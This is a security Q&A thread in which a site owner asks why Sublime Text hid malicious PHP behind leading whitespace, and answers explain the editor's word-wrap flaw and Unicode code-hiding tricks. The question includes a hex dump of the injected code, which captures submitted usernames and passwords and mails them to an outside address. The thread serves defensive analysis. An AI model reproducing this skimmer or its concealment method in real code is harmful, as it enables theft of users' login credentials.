50

I recently came across a php file on a compromised website that had what appeared (in Sublime Text) to be a huge white-space gap. When I run a diff against the original source file I can clearly see the malicious code which is snagging logins and passwords and emailing them to someone.

The malicious code can also be clearly seen using vim.

My assumption is that this is some kind of encoding exploit but I can't for the life of me figure out how it's being hidden and I've never seen anything like this before.

Is anyone familiar with this kind of hidden code exploit? Is there a way to make it visible inside Sublime? I realize it may be difficult to say without seeing the file - I am happy to provide said file if need be.

EDIT - Hex dump as requested:

0000000 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
*
00000c0 20 20 20 20 20 20 20 20 20 69 66 28 24 74 68 69
00000d0 73 2d 3e 75 73 65 72 2d 3e 6c 6f 67 69 6e 28 24
00000e0 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70
00000f0 6f 73 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2c
0000100 20 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d
0000110 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 27
0000120 5d 29 29 7b 24 73 6d 61 69 6c 3d 24 5f 53 45 52
0000130 56 45 52 5b 27 48 54 54 50 5f 48 4f 53 54 27 5d
0000140 2e 24 5f 53 45 52 56 45 52 5b 27 52 45 51 55 45
0000150 53 54 5f 55 52 49 27 5d 2e 22 7c 22 2e 24 74 68
0000160 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 6f 73
0000170 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2e 22 7c
0000180 22 2e 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74
0000190 2d 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64
00001a0 27 5d 3b 6d 61 69 6c 28 22 61 6c 74 2e 65 69 2d
00001b0 36 6f 6b 36 77 36 76 32 40 79 6f 70 6d 61 69 6c
00001c0 2e 63 6f 6d 22 2c 24 5f 53 45 52 56 45 52 5b 27
00001d0 48 54 54 50 5f 48 4f 53 54 27 5d 2c 24 73 6d 61
00001e0 69 6c 2c 22 46 72 6f 6d 3a 20 61 64 6d 69 6e 40
00001f0 66 6c 79 2e 63 6f 6d 5c 72 5c 6e 52 65 70 6c 79
0000200 2d 74 6f 3a 20 61 6c 74 2e 65 69 2d 36 6f 6b 36
0000210 77 36 76 32 40 79 6f 70 6d 61 69 6c 2e 63 6f 6d
0000220 22 29 3b
0000223
10
  • 3
    @forest - I've added the hex dump. Seems this is accomplished by something as simple as... whitespace?! I'm still trying to wrap my head around how adding a bunch of whitespace is causing Sublime to not show the trailing text. It seems like total lunacy - I'm sure there is a setting for this, and also sure that the code author is well aware of this nonesensical behaviour and using it as an exploit. I'd really like my text editor to not do this. Commented Feb 14, 2023 at 1:55
  • 3
    This is actually a fairly-well known technique. In fact, GCC has recently been modified to detect attacks that exploit how text editors parse unicode and control characters.
    – forest
    Commented Feb 14, 2023 at 1:57
  • 3
    I discovered that if I turn off indent_subsequent_lines the text becomes visible - however that really makes everything else ugly. I wish there were a setting to keep lines indented but side scroll if the indented column was smaller than X. As is often the case, your question led to understanding and a solution. I'm not even sure this question is on topic here. I'd defer to you and delete it if you think it should go. lmk and thanks! Commented Feb 14, 2023 at 2:03
  • 3
    I think the question is on-topic. It may be useful to someone else, especially if someone answers it with a good, general answer or links it as a duplicate to another question (which improves its visibility).
    – forest
    Commented Feb 14, 2023 at 2:04
  • 3
    This looks more like they are just pushing the visible code off to the right of your screen, but I see nothing in that hex dump that isn't visible ASCII characters (0x21-0x7e) or an ASCII space (0x20). That should be fully visible in Sublime Text with nothing needed besides scrolling to the right spot, at least as far as that hex dump seems to indicate.
    – penguin359
    Commented Feb 15, 2023 at 0:10

3 Answers 3

62

The code is exploiting a flaw in Sublime to prevent text from being displayed.

This is what part of the code looks like in Notepad++. It is obviously looking for post['username'] and post['password'].

enter image description here

And Notepad++ can handle even 7000 characters when word wrapping:

enter image description here

The flaw is due to Sublime's incorrect word wrap behavior. The 200 leading spaces indents the text far off the screen while also disabling the horizontal scrollbar due to "word wrap", but it actually isn't wrapping any of the text due to treating the 200 spaces as an indent. Zooming out or turning off word wrap would've displayed the text fine.

enter image description here

Sublime has its own HexViewer and that has no problems displaying the code on the ASCII panel:

enter image description here

9
  • 6
    What is that flaw? How do a few spaces throw Sublime off?
    – Bergi
    Commented Feb 15, 2023 at 1:29
  • 18
    Who exactly cloaks their exploit against one text editor only?
    – Hobbamok
    Commented Feb 15, 2023 at 15:08
  • 16
    @Hobbamok - Cloaking it against one with a massive market share makes sense... At one point, Sublime was very dominant. If you cloaked it against VSCode today that wouldn't be the worst idea, it would fool a decent number of devs Commented Feb 15, 2023 at 17:56
  • 3
    @Hobbamok - It's hard for me to say but I suspect many editors besides Sublime have similar behaviour or at the very least, the malicious code stands a reasonable chance being off screen without a sidescroll. Commented Feb 15, 2023 at 21:35
  • 5
    @EatenbyaGrue Even the basic Notepad.exe in Windows, the one that can't even display UTF-8, is doing this correctly. Sublime is treating the leading spaces as an explicit indent and maintains the 200 characters, assumes that because it is in "Word Wrap" mode, you don't need the horizontal bar, whereas other editors prioritized text display and would simply start wrapping once it exceeds the window size.
    – Nelson
    Commented Feb 16, 2023 at 0:43
13

This is a very old story:

In short there are certain unicode symbols which allow to hide code from certain text editors. If your text editor doesn't know how to deal with these attacks, I'd highly recommend using something different.

6
  • 12
    Those are just the ordinary space character (0x20), no fancy Unicode exploits involved
    – Ben Voigt
    Commented Feb 14, 2023 at 18:20
  • 11
    The characters used in Trojan Source attacks don't appear in the provided hex dump. Commented Feb 14, 2023 at 19:39
  • Thanks to Unicode's brilliant rules involving left-to-right and right-to-left scripts, most "properly working" text editors will show some arrangements of source-text characters in a mixed up sequence that may look like something else.
    – supercat
    Commented Feb 14, 2023 at 22:39
  • 1
    I should correct my last statement. I can certainly find something malicious, but I don't see anything that would magically hide the source code. It should be fully visible with nothing needed besides exercising the horizontal scrollbar heavily.
    – penguin359
    Commented Feb 15, 2023 at 0:15
  • 3
    The Wikipedia article says Trojan source was discovered September, 9th 2021. This is far from being very old. Many editors soon adopted a strategy to point malicious code out so it became a non-issue very fast. Commented Feb 15, 2023 at 10:36
4

There are several Unicode characters that are not visible. The space character obviously and the non-breaking space are quite commonly used. But there are more, and some may be allowed in programming languages that support unicode in source code. For example in Swift it is possible to have a valid variable name that is just invisible (I haven't checked C++, Java, C# and so on but they may be the same). Worst case, you see a single "=" character, and it is really an assignment from one variable with an invisible name to another.

There are also several pairs of Unicode characters that look exactly the same. For example uppercase A and uppercase greek alpha. You have the same problem there. That's probably even more dangerous, because you see code that looks valid (it is actually valid) but you don't realise it's dangerous - with invisible variable names, you can see that obviously something is dodgy.

Finally, there are Unicode characters that can be formed from multiple Unicode code points in different ways. For example there is a code point "lowercase letter e with dieresis" ë and two code points "lowercase letter e" followed by "modifier dieresis" which looks exactly the same. To your programming language they might be the same and to your text editor they might be different, or the other way round.

In your example you just have plenty of whitespace. With some editors for programming, lots of whitespace might force code to be off your display. Without text wrapping, if your editor shows 100 characters, and I start a line with 100 space characters, the actually interesting code might be outside your window and invisible.

Now the good thing: All these problems are just causing malicious code to pass visual inspection. Most malicious code is never looked at by anyone, so there is only little additional risk added. Most people would never have looked at your php code at all.

Any automatic tools examining code should not be tricked by most of these, without any special measures, with the exception of having different Unicode code points for the same character. Any such tool should reject any invalid UTF-8, and convert any unicode characters with different representations into a normalised representation, as soon as any supposed utf-8 data comes in, and throw out the original.

3
  • 9
    I don't see any characters outside of the printable ASCII range in the hex dump. Commented Feb 14, 2023 at 19:39
  • 1
    C++ doesn't permit invisible names, and I'm pretty sure Java doesn't either.
    – Mark
    Commented Feb 15, 2023 at 2:29
  • Yes, it's quite frightening that Swift does. But as I said, when you look at such code, you see immediately that something "interesting" is going on.
    – gnasher729
    Commented Feb 15, 2023 at 16:37

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .